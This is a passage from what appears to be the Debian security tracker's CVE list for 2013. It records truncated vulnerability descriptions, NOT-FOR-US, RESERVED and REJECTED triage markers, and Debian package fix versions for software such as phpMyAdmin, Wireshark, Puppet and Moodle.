CVE-2013-5104 RESERVED
CVE-2013-5103 RESERVED
CVE-2013-5102 RESERVED
CVE-2013-5101 RESERVED
CVE-2013-5100 (Cross-site scripting (XSS) vulnerability in the Static Methods since 2 ...)
	NOT-FOR-US: TYPO3 extension Static Methods
CVE-2013-5099 (Cross-site scripting (XSS) vulnerability in article.php in Anchor CMS ...)
	NOT-FOR-US: Anchor CMS
CVE-2013-5098 (Cross-site scripting (XSS) vulnerability in admin/admin.php in the Dow ...)
	NOT-FOR-US: WordPress plugin download-monitor
CVE-2013-5097 (Juniper Junos Space before 13.1R1.6, as used on the JA1500 appliance a ...)
	NOT-FOR-US: Juniper Junos Space
CVE-2013-5096 (Juniper Junos Space before 13.1R1.6, as used on the JA1500 appliance a ...)
	NOT-FOR-US: Juniper Junos Space
CVE-2013-5095 (Cross-site scripting (XSS) vulnerability in the web-based interface in ...)
	NOT-FOR-US: Juniper Junos Space
CVE-2013-5094 (Cross-site scripting (XSS) vulnerability in index.exp in McAfee Vulner ...)
	NOT-FOR-US: McAfee Vulnerability Manager
CVE-2013-5093 (The renderLocalView function in render/views.py in graphite-web in Gra ...)
	- graphite-web 0.9.12+debian-1 (bug #720454)
	NOTE: http://ceriksen.com/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/
CVE-2013-5092 (Cross-site scripting (XSS) vulnerability in afa/php/Login.php in AlgoS ...)
	NOT-FOR-US: AlgoSec Firewall Analyzer
CVE-2013-5091 (SQL injection vulnerability in CalendarCommon.php in vTiger CRM 5.4.0 ...)
	NOT-FOR-US: vTiger CRM
CVE-2013-5090 REJECTED
CVE-2013-5089 REJECTED
CVE-2013-5088 REJECTED
CVE-2013-5087 REJECTED
CVE-2013-5086 REJECTED
CVE-2013-5085 REJECTED
CVE-2013-5084 REJECTED
CVE-2013-5083 REJECTED
CVE-2013-5082 REJECTED
CVE-2013-5081 REJECTED
CVE-2013-5080 REJECTED
CVE-2013-5079 REJECTED
CVE-2013-5078 REJECTED
CVE-2013-5077 REJECTED
CVE-2013-5076 REJECTED
CVE-2013-5075 REJECTED
CVE-2013-5074 REJECTED
CVE-2013-5073 REJECTED
CVE-2013-5072 (Cross-site scripting (XSS) vulnerability in Outlook Web Access in Micr ...)
	NOT-FOR-US: Microsoft Exchange Server OWA
CVE-2013-5071 REJECTED
CVE-2013-5070 REJECTED
CVE-2013-5069 REJECTED
CVE-2013-5068 REJECTED
CVE-2013-5067 REJECTED
CVE-2013-5066 REJECTED
CVE-2013-5065 (NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Serv ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-5064 REJECTED
CVE-2013-5063 REJECTED
CVE-2013-5062 REJECTED
CVE-2013-5061 REJECTED
CVE-2013-5060 REJECTED
CVE-2013-5059 (Microsoft SharePoint Server 2010 SP1 and SP2 and 2013, and Office Web ...)
	NOT-FOR-US: Microsoft SharePoint Server
CVE-2013-5058 (Integer overflow in the kernel-mode drivers in Microsoft Windows XP SP ...)
	NOT-FOR-US: Microsoft Windows Kernel
CVE-2013-5057 (hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not im ...)
	NOT-FOR-US: Microsoft Office
CVE-2013-5056 (Use-after-free vulnerability in the Scripting Runtime Object Library i ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-5055 REJECTED
CVE-2013-5054 (Microsoft Office 2013 and 2013 RT allows remote attackers to discover ...)
	NOT-FOR-US: Microsoft Office
CVE-2013-5053 REJECTED
CVE-2013-5052 (Microsoft Internet Explorer 7 allows remote attackers to execute arbit ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-5051 (Microsoft Internet Explorer 10 and 11 allows remote attackers to execu ...)
NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5050 REJECTED CVE-2013-5049 (Microsoft Internet Explorer 6 through 9 allows remote attackers to exe ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5048 (Microsoft Internet Explorer 6 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5047 (Microsoft Internet Explorer 6 through 11 allows remote attackers to ex ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5046 (Microsoft Internet Explorer 7 through 11 allows local users to bypass ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5045 (Microsoft Internet Explorer 10 and 11 allows local users to bypass the ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-5044 REJECTED CVE-2013-5043 REJECTED CVE-2013-5042 (Cross-site scripting (XSS) vulnerability in Microsoft ASP.NET SignalR ...) NOT-FOR-US: Microsoft ASP.NET SignalR CVE-2013-5041 REJECTED CVE-2013-5040 RESERVED CVE-2013-5039 (Cross-site request forgery (CSRF) vulnerability in goform/wlanBasicSec ...) NOT-FOR-US: HOT HOTBOX router CVE-2013-5038 (The HOT HOTBOX router with software 2.1.11 allows remote attackers to ...) NOT-FOR-US: HOT HOTBOX router CVE-2013-5037 (The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12 ...) NOT-FOR-US: HOT HOTBOX router CVE-2013-5036 (The Square Squash allows remote attackers to execute arbitrary code vi ...) NOT-FOR-US: Square Squash CVE-2013-5035 (Multiple race conditions in HtmlCleaner before 2.6, as used in Open-Xc ...) NOT-FOR-US: Open-Xchange CVE-2013-5034 (Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2 ...) NOT-FOR-US: Atmail CVE-2013-5033 (Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2 ...) NOT-FOR-US: Atmail CVE-2013-5032 (Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2 ...) NOT-FOR-US: Atmail CVE-2013-5031 (Unspecified vulnerability in Atmail before 6.6.4, and 7.x before 7.1.2 ...) 
NOT-FOR-US: Atmail CVE-2013-5030 (Ruckus Wireless Zoneflex 2942 devices with firmware 9.6.0.0.267 allow ...) NOT-FOR-US: Ruckus Wireless Zoneflex CVE-2013-5029 (phpMyAdmin 3.5.x and 4.0.x before 4.0.5 allows remote attackers to byp ...) - phpmyadmin 4:4.0.5-1 [squeeze] - phpmyadmin (Backport not feasible and X-Frame-Options protection enough on any modern browser) [wheezy] - phpmyadmin (Backport not feasible and X-Frame-Options protection enough on any modern browser) CVE-2013-5028 (SQL injection vulnerability in IT/hardware-list.dll in Kwoksys Kwok In ...) NOT-FOR-US: Kwok Information Server CVE-2013-5027 (Collabtive 1.0 has incorrect access control ...) - collabtive [jessie] - collabtive (fixed in version 1.1) CVE-2013-5026 (An ActiveX control in lookout650.ocx, lookout660.ocx, and lookout670.o ...) NOT-FOR-US: National Instruments Lookout CVE-2013-5025 (An ActiveX control in exlauncher.dll in the Help subsystem in National ...) NOT-FOR-US: National Instruments CVE-2013-5024 (An ActiveX control in NationalInstruments.Help2.dll in National Instru ...) NOT-FOR-US: National Instruments CVE-2013-5023 (The ActiveX controls in the HelpAsst component in NI Help Links in Nat ...) NOT-FOR-US: National Instruments CVE-2013-5022 (Absolute path traversal vulnerability in the 3D Graph ActiveX control ...) NOT-FOR-US: National Instruments CVE-2013-5021 (Multiple absolute path traversal vulnerabilities in National Instrumen ...) NOT-FOR-US: National Instruments CVE-2013-5020 (Multiple cross-site scripting (XSS) vulnerabilities in bb_admin.php in ...) NOT-FOR-US: miniBB CVE-2013-5019 (Stack-based buffer overflow in Ultra Mini HTTPD 1.21 allows remote att ...) NOT-FOR-US: Ultra Mini HTTPD CVE-2013-5018 (The is_asn1 function in strongSwan 4.1.11 through 5.0.4 does not prope ...) 
	- strongswan (Only affects 5.0.4 from experimental)
	NOTE: The PEM aspect is under control of the administrator, so not a security issue
	NOTE: The XAuth / EAP Issue only affects 5.0.3/5.0.4
CVE-2013-5017 (SNMPConfig.php in the management console in Symantec Web Gateway (SWG) ...)
	NOT-FOR-US: Symantec Web Gateway
CVE-2013-5016 (Symantec Critical System Protection (SCSP) before 5.2.9, when installe ...)
	NOT-FOR-US: Symantec
CVE-2013-5015 (SQL injection vulnerability in the management console in Symantec Endp ...)
	NOT-FOR-US: Symantec Endpoint Protection
CVE-2013-5014 (The management console in Symantec Endpoint Protection Manager (SEPM) ...)
	NOT-FOR-US: Symantec Endpoint Protection
CVE-2013-5013 (Multiple cross-site scripting (XSS) vulnerabilities in the management ...)
	NOT-FOR-US: Symantec Web Gateway
CVE-2013-5012 (Multiple SQL injection vulnerabilities in the management console on th ...)
	NOT-FOR-US: Symantec Web Gateway
CVE-2013-5011 (Unquoted Windows search path vulnerability in the client in Symantec E ...)
	NOT-FOR-US: Symantec Endpoint Protection
CVE-2013-5010 (The Application/Device Control (ADC) component in the client in Symant ...)
	NOT-FOR-US: Symantec Endpoint Protection
CVE-2013-5009 (The Management Console in Symantec Endpoint Protection (SEP) 11.x befo ...)
	NOT-FOR-US: Symantec Endpoint Protection
CVE-2013-5008 (The agent and task-agent components in Symantec Management Platform 7. ...)
	NOT-FOR-US: Symantec
CVE-2013-5007 RESERVED
CVE-2013-5006 (main_internet.php on the Western Digital My Net N600 and N750 with fir ...)
	NOT-FOR-US: Western Digital Router
CVE-2013-5005 (Multiple cross-site scripting (XSS) vulnerabilities in ajaxRequest/met ...)
	NOT-FOR-US: Tripwire Enterprise
CVE-2013-5004 RESERVED
CVE-2013-4994 RESERVED
CVE-2013-4993 RESERVED
CVE-2013-4992 RESERVED
CVE-2013-4991 RESERVED
CVE-2013-4990 RESERVED
CVE-2013-4989 RESERVED
CVE-2013-4988 (Stack-based buffer overflow in IcoFX 2.5 and earlier allows remote att ...)
	NOT-FOR-US: IcoFX
CVE-2013-4987 (PineApp Mail-SeCure before 3.70 allows remote authenticated users to g ...)
	NOT-FOR-US: PineApp
CVE-2013-4986 (Stack-based buffer overflow in PDFAX0722_IconCool.dll 7.22.1125.2121 i ...)
	NOT-FOR-US: PDFCool
CVE-2013-4985 (Multiple Vivotek IP Cameras remote authentication bypass that could al ...)
	NOT-FOR-US: Vivotek IP Cameras
CVE-2013-4984 (The close_connections function in /opt/cma/bin/clear_keys.pl in Sophos ...)
	NOT-FOR-US: Sophos Web Protection Appliance
CVE-2013-4983 (The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appl ...)
	NOT-FOR-US: Sophos Web Protection Appliance
CVE-2013-4982 (AVTECH AVN801 DVR has a security bypass via the administration login c ...)
	NOT-FOR-US: AVTECH DVR
CVE-2013-4981 (Buffer overflow in cgi-bin/user/Config.cgi in AVTECH AVN801 DVR with f ...)
	NOT-FOR-US: AVTECH DVR
CVE-2013-4980 (Buffer overflow in the RTSP Packet Handler in AVTECH AVN801 DVR with f ...)
	NOT-FOR-US: AVTECH DVR
CVE-2013-4979 (Buffer overflow in the gldll32.dll module in EPS Viewer 3.2 and earlie ...)
	NOT-FOR-US: EPS Viewer
CVE-2013-4978 (Stack-based buffer overflow in AloahaPDFViewer 5.0.0.7 and earlier in ...)
	NOT-FOR-US: Aloaha PDF Suite
CVE-2013-4977 (Buffer overflow in the RTSP Packet Handler in Hikvision DS-2CD7153-E I ...)
	NOT-FOR-US: Hikvision IP camera
CVE-2013-4976 (Hikvision DS-2CD7153-E IP Camera has security bypass via hardcoded cre ...)
	NOT-FOR-US: Hikvision DS-2CD7153-E IP Camera
CVE-2013-4975 (Hikvision DS-2CD7153-E IP Camera has Privilege Escalation ...)
	NOT-FOR-US: Hikvision DS-2CD7153-E IP Camera
CVE-2013-4974 (RealNetworks RealPlayer before 16.0.3.51, and RealPlayer SP 1.0 throug ...)
	NOT-FOR-US: RealPlayer
CVE-2013-4973 (Stack-based buffer overflow in RealNetworks RealPlayer before 16.0.3.5 ...)
	NOT-FOR-US: RealPlayer
CVE-2013-4972 RESERVED
CVE-2013-4971 (Puppet Enterprise before 3.2.0 does not properly restrict access to no ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4970 RESERVED
CVE-2013-4969 (Puppet before 3.3.3 and 3.4 before 3.4.1 and Puppet Enterprise (PE) be ...)
	{DSA-2831-1}
	- puppet 3.4.1-1
	NOTE: http://puppetlabs.com/security/cve/cve-2013-4969
CVE-2013-4968 (Puppet Enterprise before 3.0.1 allows remote attackers to (1) conduct ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4967 (Puppet Enterprise before 3.0.1 allows remote attackers to obtain the d ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4966 (The master external node classification script in Puppet Enterprise be ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4965 (Puppet Enterprise before 3.1.0 does not properly restrict the number o ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4964 (Puppet Enterprise before 3.0.1 does not set the secure flag for the se ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4963 (Multiple cross-site request forgery (CSRF) vulnerabilities in Puppet E ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4962 (The reset password page in Puppet Enterprise before 3.0.1 does not for ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4961 (Puppet Enterprise before 3.0.1 includes version information for the Ap ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4960 RESERVED
CVE-2013-4959 (Puppet Enterprise before 3.0.1 uses HTTP responses that contain sensit ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4958 (Puppet Enterprise before 3.0.1 does not use a session timeout, which m ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4957 (The dashboard report in Puppet Enterprise before 3.0.1 allows attacker ...)
	NOT-FOR-US: puppet-dashboard
CVE-2013-4956 (Puppet Module Tool (PMT), as used in Puppet 2.7.x before 2.7.23 and 3. ...)
	{DSA-2761-1}
	- puppet 3.2.4-1
	[squeeze] - puppet <not-affected> (puppet module not yet present)
CVE-2013-4955 (Open redirect vulnerability in the login page in Puppet Enterprise bef ...)
	- puppet <not-affected> (Only affects Puppet Enterprise)
CVE-2013-4954 (Multiple cross-site scripting (XSS) vulnerabilities in wp-login.php in ...)
	NOT-FOR-US: Genetech Solutions Pie-Register
CVE-2013-4953 (SQL injection vulnerability in play.php in Top Games Script 1.2 allows ...)
	NOT-FOR-US: Top Games Script
CVE-2013-4952 (SQL injection vulnerability in functions/global.php in Elemata CMS RC ...)
	NOT-FOR-US: Elemata CMS
CVE-2013-4951 (Multiple cross-site scripting (XSS) vulnerabilities in Mintboard 0.3 a ...)
	NOT-FOR-US: Mintboard
CVE-2013-4950 (Cross-site scripting (XSS) vulnerability in view.php in Machform 2 all ...)
	NOT-FOR-US: Machform
CVE-2013-4949 (Unrestricted file upload vulnerability in view.php in Machform 2 allow ...)
	NOT-FOR-US: Machform
CVE-2013-4948 (SQL injection vulnerability in view.php in Machform 2 allows remote at ...)
	NOT-FOR-US: Machform
CVE-2013-4947 (Unspecified vulnerability in the update and build database page in Saw ...)
	NOT-FOR-US: Sawmill
CVE-2013-4946 (Multiple cross-site scripting (XSS) vulnerabilities in BMC Service Des ...)
	NOT-FOR-US: BMC Service Desk Express
CVE-2013-4945 (Multiple SQL injection vulnerabilities in BMC Service Desk Express (SD ...)
	NOT-FOR-US: BMC Service Desk Express
CVE-2013-4944 (Cross-site scripting (XSS) vulnerability in the BuddyPress Extended Fr ...)
	NOT-FOR-US: BuddyPress
CVE-2013-4943 (The client application in Siemens COMOS before 9.1 Update 458, 9.2 bef ...)
	NOT-FOR-US: Siemens COMOS
CVE-2013-4942 (Cross-site scripting (XSS) vulnerability in flashuploader.swf in the U ...)
	- moodle 2.5.1-1
	[squeeze] - moodle <not-affected> (Vulnerable code not present)
CVE-2013-4941 (Cross-site scripting (XSS) vulnerability in uploader.swf in the Upload ...)
	- moodle 2.5.1-1
	[squeeze] - moodle <not-affected> (Vulnerable code not installed in package)
CVE-2013-4940 (Cross-site scripting (XSS) vulnerability in io.swf in the IO Utility c ...)
	- moodle 2.5.1-1
	[squeeze] - moodle <not-affected> (Vulnerable code not present)
CVE-2013-4939 (Cross-site scripting (XSS) vulnerability in io.swf in the IO Utility c ...)
	- moodle 2.5.1-1
	[squeeze] - moodle <not-affected> (Vulnerable code not present)
CVE-2013-4938 (The LTI (aka IMS-LTI) mod_form implementation in Moodle through 2.1.10 ...)
	- moodle 2.5.1-1
	[squeeze] - moodle <not-affected> (Vulnerable code not present)
CVE-2013-4995 (Cross-site scripting (XSS) vulnerability in phpMyAdmin 3.5.x before 3. ...)
	{DSA-2975-1 DLA-0014-1}
	- phpmyadmin 4:4.0.4.2-1 (low)
	[squeeze] - phpmyadmin 4:3.3.7-8
CVE-2013-4996 (Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5. ...)
	{DSA-2975-1 DLA-0014-1}
	- phpmyadmin 4:4.0.4.2-1
	[squeeze] - phpmyadmin 4:3.3.7-8
CVE-2013-4997 (Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5. ...)
	- phpmyadmin 4:4.0.4.2-1
	[wheezy] - phpmyadmin <not-affected> (Vulnerable code not present)
	[squeeze] - phpmyadmin <not-affected> (Vulnerable code not present)
CVE-2013-4998 (phpMyAdmin 3.5.x before 3.5.8.2 and 4.0.x before 4.0.4.2 allows remote ...)
	- phpmyadmin 4:4.0.4.2-1 (unimportant)
	NOTE: Full path disclosure irrelevant in Debian packages
CVE-2013-4999 (phpMyAdmin 4.0.x before 4.0.4.2 allows remote attackers to obtain sens ...)
	- phpmyadmin 4:4.0.4.2-1 (unimportant)
	NOTE: Full path disclosure irrelevant in Debian packages
CVE-2013-5000 (phpMyAdmin 3.5.x before 3.5.8.2 allows remote attackers to obtain sens ...)
	- phpmyadmin 4:4.0.4.2-1 (unimportant)
	NOTE: Full path disclosure irrelevant in Debian packages
CVE-2013-5001 (Cross-site scripting (XSS) vulnerability in libraries/plugins/transfor ...)
	- phpmyadmin 4:4.0.4.2-1 (low)
	[squeeze] - phpmyadmin <not-affected> (Vulnerable code not present)
	[wheezy] - phpmyadmin <not-affected> (Vulnerable code not present)
CVE-2013-5002 (Cross-site scripting (XSS) vulnerability in libraries/schema/Export_Re ...)
	{DSA-2975-1}
	- phpmyadmin 4:4.0.4.2-1 (low)
	[squeeze] - phpmyadmin <not-affected> (Vulnerable code not present)
CVE-2013-5003 (Multiple SQL injection vulnerabilities in phpMyAdmin 3.5.x before 3.5. ...)
	{DSA-2975-1 DLA-0014-1}
	- phpmyadmin 4:4.0.4.2-1
	[squeeze] - phpmyadmin 4:3.3.7-8
CVE-2013-4937 (Multiple unspecified vulnerabilities in the AiCloud feature on the ASU ...)
	NOT-FOR-US: Asus firmware
CVE-2013-4936 (The IsDFP_Frame function in plugins/profinet/packet-pn-rt.c in the PRO ...)
	- wireshark 1.10.1-1
	[wheezy] - wireshark <not-affected> (Only affects 1.10.x)
	[squeeze] - wireshark <not-affected> (Only affects 1.10.x)
CVE-2013-4935 (The dissect_per_length_determinant function in epan/dissectors/packet- ...)
	{DSA-2734-1}
	- wireshark 1.10.1-1
CVE-2013-4934 (The netmon_open function in wiretap/netmon.c in the Netmon file parser ...)
	{DSA-2734-1}
	- wireshark 1.10.1-1
CVE-2013-4933 (The netmon_open function in wiretap/netmon.c in the Netmon file parser ...)
	{DSA-2734-1}
	- wireshark 1.10.1-1
CVE-2013-4932 (Multiple array index errors in epan/dissectors/packet-gsm_a_common.c i ...)
	{DSA-2734-1}
	- wireshark 1.10.1-1
CVE-2013-4931 (epan/proto.c in Wireshark 1.8.x before 1.8.9 and 1.10.x before 1.10.1 ...)
	{DLA-497-1}
	- wireshark 1.10.1-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-4930 (The dissect_dvbci_tpdu_hdr function in epan/dissectors/packet-dvbci.c ...)
	{DSA-2734-1}
	- wireshark 1.10.1-1
	[squeeze] - wireshark <not-affected> (Affected dissector not yet present)
CVE-2013-4929 (The parseFields function in epan/dissectors/packet-dis-pdus.c in the D ...)
	{DLA-497-1}
	- wireshark 1.10.1-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-4928 (Integer signedness error in the dissect_headers function in epan/disse ...)
	- wireshark 1.10.1-1 (unimportant)
	[wheezy] - wireshark <not-affected> (Only affects 1.10.x)
	[squeeze] - wireshark <not-affected> (Only affects 1.10.x)
	NOTE: Not suitable for code injection
CVE-2013-4927 (Integer signedness error in the get_type_length function in epan/disse ...)
	{DLA-497-1}
	- wireshark 1.10.1-1 (unimportant)
	NOTE: Not suitable for code injection
CVE-2013-4926 (epan/dissectors/packet-dcom-sysact.c in the DCOM ISystemActivator diss ...)
	- wireshark 1.10.1-1
	[wheezy] - wireshark <not-affected> (Only affects 1.10.x)
	[squeeze] - wireshark <not-affected> (Only affects 1.10.x)
CVE-2013-4925 (Integer signedness error in epan/dissectors/packet-dcom-sysact.c in th ...)
	- wireshark 1.10.1-1
	[wheezy] - wireshark <not-affected> (Only affects 1.10.x)
	[squeeze] - wireshark <not-affected> (Only affects 1.10.x)
CVE-2013-4924 (epan/dissectors/packet-dcom-sysact.c in the DCOM ISystemActivator diss ...)
	- wireshark 1.10.1-1
	[wheezy] - wireshark <not-affected> (Only affects 1.10.x)
	[squeeze] - wireshark <not-affected> (Only affects 1.10.x)
CVE-2013-4923 (Memory leak in the dissect_dcom_ActivationProperties function in epan/ ...)
	- wireshark 1.10.1-1
	[wheezy] - wireshark <not-affected> (Only affects 1.10.x)
	[squeeze] - wireshark <not-affected> (Only affects 1.10.x)
CVE-2013-4922 (Double free vulnerability in the dissect_dcom_ActivationProperties fun ...)
	- wireshark 1.10.1-1
	[wheezy] - wireshark <not-affected> (Only affects 1.10.x)
	[squeeze] - wireshark <not-affected> (Only affects 1.10.x)
CVE-2013-4921 (Off-by-one error in the dissect_radiotap function in epan/dissectors/p ...)
	- wireshark 1.10.1-1
	[wheezy] - wireshark <not-affected> (Only affects 1.10.x)
	[squeeze] - wireshark <not-affected> (Only affects 1.10.x)
CVE-2013-4920 (The P1 dissector in Wireshark 1.10.x before 1.10.1 does not properly i ...)
	- wireshark 1.10.1-1
	[wheezy] - wireshark <not-affected> (Only affects 1.10.x)
	[squeeze] - wireshark <not-affected> (Only affects 1.10.x)
CVE-2013-4919 RESERVED
CVE-2013-4918 RESERVED
CVE-2013-4917 RESERVED
CVE-2013-4916 RESERVED
CVE-2013-4915 RESERVED
CVE-2013-4914 RESERVED
CVE-2013-4913 RESERVED
CVE-2013-4912 (Open redirect vulnerability in Siemens WinCC (TIA Portal) 11 and 12 be ...)
	NOT-FOR-US: Siemens
CVE-2013-4911 (Cross-site request forgery (CSRF) vulnerability in Siemens WinCC (TIA ...)
	NOT-FOR-US: Siemens
CVE-2013-4910 RESERVED
CVE-2013-4909 RESERVED
CVE-2013-4908 RESERVED
CVE-2013-4907 RESERVED
CVE-2013-4906 RESERVED
CVE-2013-4905 RESERVED
CVE-2013-4904 RESERVED
CVE-2013-4903 RESERVED
CVE-2013-4902 RESERVED
CVE-2013-4901 RESERVED
CVE-2013-4900 (Directory traversal vulnerability in DeWeS web server 0.4.2 and possib ...)
	NOT-FOR-US: DeWeS web server (Twilight CMS)
CVE-2013-4899 (Cross-site scripting (XSS) vulnerability in Twilight CMS 5.17 and poss ...)
	NOT-FOR-US: Twilight CMS
CVE-2013-4898 (Unrestricted file upload vulnerability in the user profile page featur ...)
	NOT-FOR-US: Timeline Plugin for SocialEngine
CVE-2013-4897 REJECTED
CVE-2013-4896 RESERVED
CVE-2013-4895 RESERVED
CVE-2013-4894 RESERVED
CVE-2013-4893 RESERVED
CVE-2013-4892 RESERVED
CVE-2013-4891 (The xss_clean function in CodeIgniter before 2.1.4 might allow remote ...)
	- codeigniter (bug #471583)
CVE-2013-4889 (Multiple cross-site request forgery (CSRF) vulnerabilities in index.ph ...)
	NOT-FOR-US: Digital Signage Xibo
CVE-2013-4888 (Cross-site scripting (XSS) vulnerability in index.php in Digital Signa ...)
	NOT-FOR-US: Digital Signage Xibo
CVE-2013-4887 (SQL injection vulnerability in index.php in Digital Signage Xibo 1.4.2 ...)
	NOT-FOR-US: Digital Signage Xibo
CVE-2013-4886 RESERVED
CVE-2013-4885 (The http-domino-enum-passwords.nse script in NMap before 6.40, when do ...)
	- nmap 6.40-0.1 (low; bug #719289)
	[squeeze] - nmap <not-affected> (Vulnerable code not present)
	[wheezy] - nmap 6.00-0.3+deb7u1
CVE-2013-4884 (Cross-site scripting (XSS) vulnerability in McAfee SuperScan 4.0 allow ...)
	NOT-FOR-US: McAfee SuperScan
CVE-2013-5217 REJECTED
CVE-2013-4890 (The DMCRUIS/0.1 web server on the Samsung PS50C7700 TV allows remote a ...)
	NOT-FOR-US: Samsung TV
CVE-2013-4883 (Multiple cross-site scripting (XSS) vulnerabilities in McAfee ePolicy ...)
	NOT-FOR-US: McAfee ePolicy Orchestrator
CVE-2013-4882 (Multiple SQL injection vulnerabilities in McAfee ePolicy Orchestrator ...)
	NOT-FOR-US: McAfee ePolicy Orchestrator
CVE-2013-4881 (Cross-site request forgery (CSRF) vulnerability in core/admin/modules/ ...)
	NOT-FOR-US: BigTree CMS
CVE-2013-4880 (Cross-site scripting (XSS) vulnerability in core/admin/modules/develop ...)
	NOT-FOR-US: BigTree CMS
CVE-2013-4879 (SQL injection vulnerability in core/inc/bigtree/cms.php in BigTree CMS ...)
	NOT-FOR-US: BigTree CMS
CVE-2013-4878 (The default configuration of Parallels Plesk Panel 9.0.x and 9.2.x on ...)
	NOT-FOR-US: Parallels Plesk Panel
CVE-2013-4877 (The Verizon Wireless Network Extender SCS-26UC4 and SCS-2U01 does not ...)
	NOT-FOR-US: Verizon Wireless Network Extender
CVE-2013-4876 (The Verizon Wireless Network Extender SCS-2U01 has a hardcoded passwor ...)
	NOT-FOR-US: Verizon Wireless Network Extender
CVE-2013-4875 (The Uboot bootloader on the Verizon Wireless Network Extender SCS-2U01 ...)
	NOT-FOR-US: Verizon Wireless Network Extender SCS-2U01
CVE-2013-4874 (The Uboot bootloader on the Verizon Wireless Network Extender SCS-26UC ...)
	NOT-FOR-US: Verizon Wireless Network Extender
CVE-2013-4873 (The Yahoo! Tumblr app before 3.4.1 for iOS sends cleartext credentials ...)
	NOT-FOR-US: iOS app
CVE-2013-4872 (Google Glass before XE6 does not properly restrict the processing of Q ...)
	NOT-FOR-US: Google Glass
CVE-2013-4871 (Cross-site request forgery (CSRF) vulnerability in the TEQneers SEO En ...)
	NOT-FOR-US: TYPO3 extension tq_seo
CVE-2013-4870 (SQL injection vulnerability in the News Search (news_search) extension ...)
	NOT-FOR-US: TYPO3 extension news_search
CVE-2013-4869 (Cisco Unified Communications Manager (CUCM) 7.1(x) through 9.1(2) and ...)
	NOT-FOR-US: Cisco
CVE-2013-4868 (Karotz API 12.07.19.00: Session Token Information Disclosure ...)
	NOT-FOR-US: Karotz API
CVE-2013-4867 (Electronic Arts Karotz Smart Rabbit 12.07.19.00 allows Python module h ...)
	NOT-FOR-US: Electronic Arts Karotz Smart Rabbit
CVE-2013-4866 (The LIXIL Corporation My SATIS Genius Toilet application for Android h ...)
	NOT-FOR-US: LIXIL Corporation My SATIS Genius Toilet application for Android
CVE-2013-4865 (Cross-site request forgery (CSRF) vulnerability in upgrade_step2.sh in ...)
	NOT-FOR-US: MiCasaVerde VeraLite
CVE-2013-4864 (MiCasaVerde VeraLite with firmware 1.5.408 allows remote attackers to ...)
	NOT-FOR-US: MiCasaVerde VeraLite
CVE-2013-4863 (The HomeAutomationGateway service in MiCasaVerde VeraLite with firmwar ...)
	NOT-FOR-US: MiCasaVerde VeraLite
CVE-2013-4862 (MiCasaVerde VeraLite with firmware 1.5.408 does not properly restrict ...)
	NOT-FOR-US: MiCasaVerde VeraLite
CVE-2013-4861 (Directory traversal vulnerability in cgi-bin/cmh/get_file.sh in MiCasa ...)
	NOT-FOR-US: MiCasaVerde VeraLite
CVE-2013-4860 (Radio Thermostat CT80 And CT50 with firmware 1.4.64 and earlier does n ...)
	NOT-FOR-US: Radio Thermostat
CVE-2013-4859 (INSTEON Hub 2242-222 lacks Web and API authentication ...)
	NOT-FOR-US: INSTEON Hub
CVE-2013-4858 (Microsoft Windows Movie Maker 2.1.4026.0 on Windows XP SP3 allows remo ...)
	NOT-FOR-US: Microsoft Windows Movie Maker
CVE-2013-4857 (D-Link DIR-865L has PHP File Inclusion in the router xml file. ...)
	NOT-FOR-US: D-Link
CVE-2013-4856 (D-Link DIR-865L has Information Disclosure. ...)
	NOT-FOR-US: D-Link
CVE-2013-4855 (D-Link DIR-865L has SMB Symlink Traversal due to misconfiguration in t ...)
	NOT-FOR-US: D-Link
CVE-2013-4854 (The RFC 5011 implementation in rdata.c in ISC BIND 9.7.x and 9.8.x bef ...)
	{DSA-2728-1}
	- bind9 1:9.8.4.dfsg.P1-6+nmu3 (bug #717936)
	NOTE: https://kb.isc.org/article/AA-01015/0
CVE-2013-4853 RESERVED
CVE-2013-4852 (Integer overflow in PuTTY 0.62 and earlier, WinSCP before 5.1.6, and o ...)
	{DSA-2736-1}
	- putty 0.63-1 (bug #718779)
	- filezilla 3.7.3-1 (low; bug #718800)
	[squeeze] - filezilla <no-dsa> (Minor issue)
	[wheezy] - filezilla <no-dsa> (Minor issue)
	NOTE: http://www.securityfocus.com/archive/1/527763/30/0
	NOTE: http://svn.tartarus.org/sgt?view=revision&sortby=date&revision=9896
CVE-2013-4851 (The vfs_hang_addrlist function in sys/kern/vfs_export.c in the NFS ser ...)
	{DSA-2743-1}
	- kfreebsd-9 9.1-4 (bug #717958)
	- kfreebsd-8 8.3-7 (bug #717959)
	[wheezy] - kfreebsd-8 8.3-6+deb7u1
